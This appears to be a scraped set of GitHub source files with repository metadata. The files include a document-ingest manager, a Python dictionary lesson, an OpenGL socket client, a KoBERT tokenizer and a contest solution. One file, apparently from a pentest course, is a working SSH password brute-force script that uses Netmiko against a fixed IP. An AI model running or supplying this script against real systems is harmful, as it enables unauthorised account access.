a0fb061548bfd69cb764cc4823ae29227aa804a6 | 0e8ab63a60fd03b1778aa392c0b11fedd88409e4 | /ingest/ingest/manager.py | 8ed7b3d707ce64b45eb7b82fa5323c3a84a15a39 | [] | no_license | Kyeongrok/dms | babeb19115355c3d930c94c89ca55d3e5de2dc55 | a67c446f0ffd3f9a1812de961ef915c405a4096f | refs/heads/master | 2021-06-23T22:44:18.881538 | 2019-09-26T03:42:13 | 2019-09-26T03:42:13 | 210,993,619 | 0 | 0 | null | 2021-03-25T22:57:32 | 2019-09-26T03:41:24 | Python | UTF-8 | Python | false | false | 2,747 | py | import abc
import logging
import os
from dmsclient.client import DMSClient
from dmsclient.exceptions import DMSClientException
from ingest import util
from ingest.logger import ElasticsearchHandler, JournalFormatter
class AbstractIngestManager(abc.ABC):
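    """Base class for ingest managers.

    Wires up configuration, the DMS client, optional Elasticsearch logging and
    input-path checks; concrete subclasses implement run().
    """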
def __init__(self, config, mount_path, reader_id, cartridge_id):
self.log = logging.getLogger('ingest.manager')
self.config = config
self.thread_count = config['general']['threads']
self.check_mountpoints = config['general']['check_mountpoints']
self.ignore_directories = config['general']['ignore_directories']
self.log_to_es = config['general']['log_to_es']
self.mount_path = mount_path
self.reader_id = reader_id
self.cartridge_id = cartridge_id
self.client = DMSClient(es_endpoint=config['elasticsearch']['endpoint'],
es_user=config['elasticsearch']['user'],
es_password=config['elasticsearch']['password'],
create_templates=config['elasticsearch']['create_templates'],
verify_templates=config['elasticsearch']['verify_templates'])
if self.log_to_es:
handler = ElasticsearchHandler(self.client)
formatter = JournalFormatter()
handler.setFormatter(formatter)
root_logger = logging.getLogger('ingest')
root_logger.addHandler(handler)
if not self.mount_path.startswith('rsync://'):
try:
self.mount_path = os.path.abspath(self.mount_path)
self.__check_path(self.mount_path, readwrite=False)
except Exception as e:
self.log.error('Error checking the input path. {}'.format(str(e),))
raise e
def update_reader(self, message):
if self.reader_id:
self.client.readers.set_message(self.reader_id, message)
def set_cartridge_workflow_type(self, cartridge_id, workflow_type):
if self.cartridge_id:
self.client.cartridges.set_workflow_type(self.cartridge_id, workflow_type)
@abc.abstractmethod
def run(self):
pass
def __check_path(self, path, readwrite=False):
if path.startswith('rsync://'):
return
if readwrite:
self.log.info("Checking write permissions on path '%s'" % (path,))
if not util.isWritable(path):
raise Exception('Cannot write to directory: %s' % (path,))
else:
self.log.info("Checking read permissions on path '%s'" % (path,))
if not util.isReadable(path):
raise Exception('Cannot read from directory: %s' % (path,))
| [
"[email protected]"
] | |
1d3aa6d35106c3460d100c2156236cc0871312ec | fc5becca3e2e48a444b512e059df1cd21601829b | /Aulas/Aula19A.py | 4d8089077e3bdd14ae5f3b3b6ced29a4100d4556 | [
"MIT"
] | permissive | Felix-xilef/Curso-de-Python | c44bf8c22b393aefaed3a2bb3127ef7999e27fb8 | cdff7c7f3850e6326e274c8c1987b9e1a18ce910 | refs/heads/master | 2021-05-19T11:09:22.644638 | 2020-04-01T22:09:02 | 2020-04-01T22:09:02 | 251,665,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 482 | py | # Dicionários {} / dict() - como uma lista, porém o indice pode ser definido (key)
pessoas = {'nome': 'Felix', 'sexo': 'm', 'idade': 18}
print(pessoas)
print(pessoas['nome'])
print(pessoas['idade'])
print(pessoas.values())
print(pessoas.keys())
print(pessoas.items())
for k, v in pessoas.items():
print(k, '=', v)
del pessoas['sexo']
print(pessoas)
pessoas['nome'] = 'Gustavo'
print(pessoas)
pessoas['peso'] = 74
print(pessoas)
input('\n\nPress <enter> to continue')
| [
"[email protected]"
] | |
c4b90c1495df475c554108312c8e2a94b88ee10d | ef66e297a49d04098d98a711ca3fda7b8a9a657c | /Python/display.py | 1b280e0ad29c46c1e08530191b08e20ef0df52eb | [] | no_license | breezy1812/MyCodes | 34940357954dad35ddcf39aa6c9bc9e5cd1748eb | 9e3d117d17025b3b587c5a80638cb8b3de754195 | refs/heads/master | 2020-07-19T13:36:05.270908 | 2018-12-15T08:54:30 | 2018-12-15T08:54:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,897 | py | # coding: UTF-8
__metaclass__ = type
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import random
import socket
i = 0
winId = 0
s = None
poses = []
SIZE = [800, 600]
clear = True
def Draw():
global poses
global clear
glEnable(GL_POINT_SMOOTH)
if clear:
glClear(GL_COLOR_BUFFER_BIT)
clear = False
glPointSize(5)
glBegin(GL_POINTS)
for item in poses:
try:
if item[2] == 1:
glVertex2f(item[0], item[1])
elif item[2] == -1:
clear = True
except:
pass
poses = []
glEnd()
glFlush()
def Update():
global s
global poses
try:
        raw = s.recv(4096)
        if not raw:  # an empty read means the peer closed the connection
            raise Exception('connection closed')
        data = raw.split('|')
        poses = map(lambda x: map(lambda y: int(y), x.split(',')), data)
except Exception, e:
print e
s.close()
sys.exit(0)
for item in poses:
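        # map pixel coordinates onto the OpenGL [-1, 1] clip square; y is negated because window y grows downwards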
item[0] = (item[0]*1.0/SIZE[0]*200-100)/100.0
item[1] = -((item[1]*1.0/SIZE[1]*200-100))/100.0
print poses
glutPostRedisplay()
def keyboardHit(key, mouseX, mouseY):
if key == 'q':
global s
glutDestroyWindow(winId)
s.close()
sys.exit()
def mouseHit(button, state, mouseX, mouseY):
pass
def mouseMotion(mouseX, mouseY):
pass
def main():
global winId
global s
s = socket.socket()
host = socket.gethostname()
s.connect((host, 1234))
glutInit()
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGBA)
glutInitWindowSize(SIZE[0], SIZE[1])
winId = glutCreateWindow("David")
glutDisplayFunc(Draw)
glutIdleFunc(Update)
glutKeyboardFunc(keyboardHit)
glutMouseFunc(mouseHit)
glutMotionFunc(mouseMotion)
glutMainLoop()
if __name__ == '__main__':
try:
main()
except Exception, e:
print e
| [
"[email protected]"
] | |
e57f6351bc13444d18ec9ae6b667d6e3d4b37ed4 | a7e75fcd05aa8ebf2066c4eb0a05496042dd5ded | /better_work_data/better_work_data/items.py | ab7aeb32e62a563ca44dce609a18c2de91fd0b79 | [
"MIT"
] | permissive | JackDan9/miniProgram | d6fe14fced0f9a154d01a6f950ab26325ed445de | d60a33275334b4caa3c15d5c6196938fb800505b | refs/heads/master | 2023-02-10T13:26:23.453536 | 2023-01-09T03:41:43 | 2023-01-09T03:41:43 | 132,235,452 | 1 | 0 | MIT | 2023-02-08T00:42:41 | 2018-05-05T09:55:32 | JavaScript | UTF-8 | Python | false | false | 515 | py | # Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class BetterWorkDataItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
order = scrapy.Field()
title = scrapy.Field()
summary = scrapy.Field()
source_type = scrapy.Field()
source_name = scrapy.Field()
publish_on = scrapy.Field()
created_on = scrapy.Field()
updated_on = scrapy.Field()
| [
"[email protected]"
] | |
1dca65b0e31944c67b64eb4542abf988338475ba | 882026439fb24cacbd1b671ae43bd0da2ac734df | /tokenization_kobert.py | 34d3fa079c7717814a8dd0d6598c01ac5a33c59f | [
"Apache-2.0"
] | permissive | fightnyy/Stock_Prediction | 94fa5761a1860429d033ecc735d9fa89d75667b8 | f0dd42bd511e74876ede92c4d10aa6384d542613 | refs/heads/master | 2023-07-11T04:30:48.546817 | 2021-08-19T06:30:01 | 2021-08-19T06:30:01 | 338,271,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,022 | py | # coding=utf-8
# Copyright 2018 Google AI, Google Brain and Carnegie Mellon University Authors and the HuggingFace Inc. team and Jangwon Park
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Tokenization classes for KoBert model."""
import logging
import os
import sentencepiece as spm
import unicodedata
from shutil import copyfile
from transformers import PreTrainedTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "tokenizer_78b3253a26.model",
"vocab_txt": "vocab.txt"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"monologg/kobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert/tokenizer_78b3253a26.model",
"monologg/kobert-lm": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert-lm/tokenizer_78b3253a26.model",
"monologg/distilkobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/distilkobert/tokenizer_78b3253a26.model"
},
"vocab_txt": {
"monologg/kobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert/vocab.txt",
"monologg/kobert-lm": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert-lm/vocab.txt",
"monologg/distilkobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/distilkobert/vocab.txt"
}
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"monologg/kobert": 512,
"monologg/kobert-lm": 512,
"monologg/distilkobert": 512
}
PRETRAINED_INIT_CONFIGURATION = {
"monologg/kobert": {"do_lower_case": False},
"monologg/kobert-lm": {"do_lower_case": False},
"monologg/distilkobert": {"do_lower_case": False}
}
SPIECE_UNDERLINE = u'▁'
class KoBertTokenizer(PreTrainedTokenizer):
"""
SentencePiece based tokenizer. Peculiarities:
- requires `SentencePiece <https://github.com/google/sentencepiece>`_
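
    Usage sketch (assumes the pretrained vocab files are downloadable):

        >>> tokenizer = KoBertTokenizer.from_pretrained('monologg/kobert')
        >>> tokenizer.tokenize("한국어 모델을 공유합니다.")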
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
def __init__(
self,
vocab_file,
vocab_txt,
do_lower_case=False,
remove_space=True,
keep_accents=False,
unk_token="[UNK]",
sep_token="[SEP]",
pad_token="[PAD]",
cls_token="[CLS]",
mask_token="[MASK]",
**kwargs):
super().__init__(
unk_token=unk_token,
sep_token=sep_token,
pad_token=pad_token,
cls_token=cls_token,
mask_token=mask_token,
**kwargs
)
# Build vocab
self.token2idx = dict()
self.idx2token = []
with open(vocab_txt, 'r', encoding='utf-8') as f:
for idx, token in enumerate(f):
token = token.strip()
self.token2idx[token] = idx
self.idx2token.append(token)
try:
import sentencepiece as spm
except ImportError:
logger.warning("You need to install SentencePiece to use KoBertTokenizer: https://github.com/google/sentencepiece"
"pip install sentencepiece")
self.do_lower_case = do_lower_case
self.remove_space = remove_space
self.keep_accents = keep_accents
self.vocab_file = vocab_file
self.vocab_txt = vocab_txt
self.sp_model = spm.SentencePieceProcessor()
self.sp_model.Load(vocab_file)
@property
def vocab_size(self):
return len(self.idx2token)
def get_vocab(self):
return dict(self.token2idx, **self.added_tokens_encoder)
def __getstate__(self):
state = self.__dict__.copy()
state["sp_model"] = None
return state
def __setstate__(self, d):
self.__dict__ = d
try:
import sentencepiece as spm
except ImportError:
logger.warning("You need to install SentencePiece to use KoBertTokenizer: https://github.com/google/sentencepiece"
"pip install sentencepiece")
self.sp_model = spm.SentencePieceProcessor()
self.sp_model.Load(self.vocab_file)
def preprocess_text(self, inputs):
if self.remove_space:
outputs = " ".join(inputs.strip().split())
else:
outputs = inputs
outputs = outputs.replace("``", '"').replace("''", '"')
if not self.keep_accents:
outputs = unicodedata.normalize('NFKD', outputs)
outputs = "".join([c for c in outputs if not unicodedata.combining(c)])
if self.do_lower_case:
outputs = outputs.lower()
return outputs
def _tokenize(self, text, return_unicode=True, sample=False):
""" Tokenize a string. """
text = self.preprocess_text(text)
if not sample:
pieces = self.sp_model.EncodeAsPieces(text)
else:
pieces = self.sp_model.SampleEncodeAsPieces(text, 64, 0.1)
new_pieces = []
for piece in pieces:
if len(piece) > 1 and piece[-1] == str(",") and piece[-2].isdigit():
cur_pieces = self.sp_model.EncodeAsPieces(piece[:-1].replace(SPIECE_UNDERLINE, ""))
if piece[0] != SPIECE_UNDERLINE and cur_pieces[0][0] == SPIECE_UNDERLINE:
if len(cur_pieces[0]) == 1:
cur_pieces = cur_pieces[1:]
else:
cur_pieces[0] = cur_pieces[0][1:]
cur_pieces.append(piece[-1])
new_pieces.extend(cur_pieces)
else:
new_pieces.append(piece)
return new_pieces
def _convert_token_to_id(self, token):
""" Converts a token (str/unicode) in an id using the vocab. """
return self.token2idx.get(token, self.token2idx[self.unk_token])
def _convert_id_to_token(self, index, return_unicode=True):
"""Converts an index (integer) in a token (string/unicode) using the vocab."""
return self.idx2token[index]
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (strings for sub-words) in a single string."""
out_string = "".join(tokens).replace(SPIECE_UNDERLINE, " ").strip()
return out_string
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks
by concatenating and adding special tokens.
A KoBERT sequence has the following format:
single sequence: [CLS] X [SEP]
pair of sequences: [CLS] A [SEP] B [SEP]
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + token_ids_1 + sep
def get_special_tokens_mask(self, token_ids_0, token_ids_1=None, already_has_special_tokens=False):
"""
Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer ``prepare_for_model`` or ``encode_plus`` methods.
Args:
token_ids_0: list of ids (must not contain special tokens)
token_ids_1: Optional list of ids (must not contain special tokens), necessary when fetching sequence ids
for sequence pairs
already_has_special_tokens: (default False) Set to True if the token list is already formated with
special tokens for the model
Returns:
A list of integers in the range [0, 1]: 0 for a special token, 1 for a sequence token.
"""
if already_has_special_tokens:
if token_ids_1 is not None:
raise ValueError(
"You should not supply a second sequence if the provided sequence of "
"ids is already formated with special tokens for the model."
)
return list(map(lambda x: 1 if x in [self.sep_token_id, self.cls_token_id] else 0, token_ids_0))
if token_ids_1 is not None:
return [1] + ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1]
def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None):
"""
Creates a mask from the two sequences passed to be used in a sequence-pair classification task.
A KoBERT sequence pair mask has the following format:
0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1
| first sequence | second sequence
if token_ids_1 is None, only returns the first portion of the mask (0's).
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
def save_vocabulary(self, save_directory):
""" Save the sentencepiece vocabulary (copy original file) and special tokens file
to a directory.
"""
if not os.path.isdir(save_directory):
logger.error("Vocabulary path ({}) should be a directory".format(save_directory))
return
# 1. Save sentencepiece model
out_vocab_model = os.path.join(save_directory, VOCAB_FILES_NAMES["vocab_file"])
if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_model):
copyfile(self.vocab_file, out_vocab_model)
# 2. Save vocab.txt
index = 0
out_vocab_txt = os.path.join(save_directory, VOCAB_FILES_NAMES["vocab_txt"])
with open(out_vocab_txt, "w", encoding="utf-8") as writer:
for token, token_index in sorted(self.token2idx.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
"Saving vocabulary to {}: vocabulary indices are not consecutive."
" Please check that the vocabulary is not corrupted!".format(out_vocab_txt)
)
index = token_index
writer.write(token + "\n")
index += 1
return out_vocab_model, out_vocab_txt
| [
"[email protected]"
] | |
dc52624b745e24996b18b3d581240cefcbe6d403 | 04934bc61ceab01ad24ab1672461a1b103884e91 | /ssh/sshconn_002.py | da12bca4af6f78377d324cb95c618bfe4ad0dab7 | [] | no_license | aiedonline/aulapentest | 05f31d0410493f02361fe778ab02d584aa84ef5e | 1dd28feb95941f49205af836c9013283b4cb6b99 | refs/heads/main | 2023-08-18T10:22:19.596876 | 2021-09-26T20:14:50 | 2021-09-26T20:14:50 | 402,219,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,257 | py | #!/usr/bin/python
import sys;
from netmiko import Netmiko
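# Dictionary attack over SSH using Netmiko: candidate usernames and passwords are
# read from user.txt and password.txt (intended for authorised lab testing only).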
ip = "11.11.11.171";
print("\033[1;33m[*] - SSH Bruteforce Attack", " \033[0;0m");
print("\033[1;33m[*] - SSH target", ip, " \033[0;0m");
with open("user.txt") as users:
users = users.readlines();
for user in users:
passwords_testados = [];
with open("password.txt") as passwords:
passwords = passwords.readlines();
			passwords.insert(0, user); # the most commonly used password is the username itself
for password in passwords:
try:
if password in passwords_testados:
continue;
sshconn = Netmiko(ip, username= user.strip(), password=password.strip(), device_type="linux");
sshconn.disconnect();
print("\033[1;32m[+] SUCES PARA", user.strip(), password.strip(), " \033[0;0m");
except KeyboardInterrupt:
					print('User requested exit.');
					sys.exit(0);
except:
print("\033[1;31m[-] FALHA PARA", user.strip(), password.strip(), " \033[0;0m");
finally:
passwords_testados.insert(0, password);
| [
"[email protected]"
] | |
6fdea119f9c9239b63eda3db6b7c2b1d0233e66d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02585/s776126936.py | 78cc9d2cac5fd2a3bfb611ed540139e54d721039 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,175 | py | import sys
sys.setrecursionlimit(10**7)
readline = sys.stdin.buffer.readline
def readstr():return readline().rstrip().decode()
def readstrs():return list(readline().decode().split())
def readint():return int(readline())
def readints():return list(map(int,readline().split()))
def printrows(x):print('\n'.join(map(str,x)))
def printline(x):print(' '.join(map(str,x)))
def check(cir,num):
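    # best score attainable within one permutation cycle `cir` using at most `num` moves:
    # prefix sums `ac` are scanned with an alternating argmax/argmin pointer walk, and the
    # second half handles the wrap-around case by excluding a complementary window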
m = len(cir)
a = sum(cir)
if num == 0:
ss = 0
elif num == 1:
ss = max(cir)
else:
ac = list(accumulate([0]+cir))
l = 0
r = 1
ss = ac[r]-ac[l]
i = 0
while 1:
if r == m:
l = ac[l+1:r].index(min(ac[l+1:r])) + l+1
ss = max(ss,ac[r]-ac[l])
break
elif i%2==0:
r = ac[r+1:l+num+1].index(max(ac[r+1:l+num+1])) + r+1
else:
l = ac[l+1:r].index(min(ac[l+1:r])) + l+1
i+=1
ss = max(ss,ac[r]-ac[l])
num = m-num
l = 0
r = num
i = 0
ss = max(ss,a-ac[r]+ac[l])
while 1:
if r == m:
l = ac[l+1:r-num+1].index(max(ac[l+1:r-num+1])) + l+1
ss = max(ss,a-ac[r]+ac[l])
break
elif i%2==0:
r = ac[r+1:l+m].index(min(ac[r+1:l+m])) + r+1
else:
l = ac[l+1:r-num+1].index(max(ac[l+1:r-num+1])) + l+1
i+=1
ss = max(ss,a-ac[r]+ac[l])
return ss
from itertools import accumulate
n,k = readints()
p = [x-1 for x in readints()]
c = readints()
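# Approach: decompose the permutation into cycles; any walk of at most k moves scores a
# contiguous (possibly wrapping, possibly repeated via full-cycle sums) segment of its cycle.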
circles = []
used = [0]*n
for i in range(n):
if not used[i]:
circles.append([c[i]])
used[i] = 1
j = p[i]
while not used[j]:
circles[-1].append(c[j])
used[j] = 1
j = p[j]
score = -10**20
for cir in circles:
m = len(cir)
a = sum(cir)
if k>m:
if a>0:
score = max(score, (k//m)*a + check(cir,k%m), (k//m-1)*a + check(cir,m))
else:
score = max(score,check(cir,m))
else:
score = max(score,check(cir,k))
print(score)
| [
"[email protected]"
] |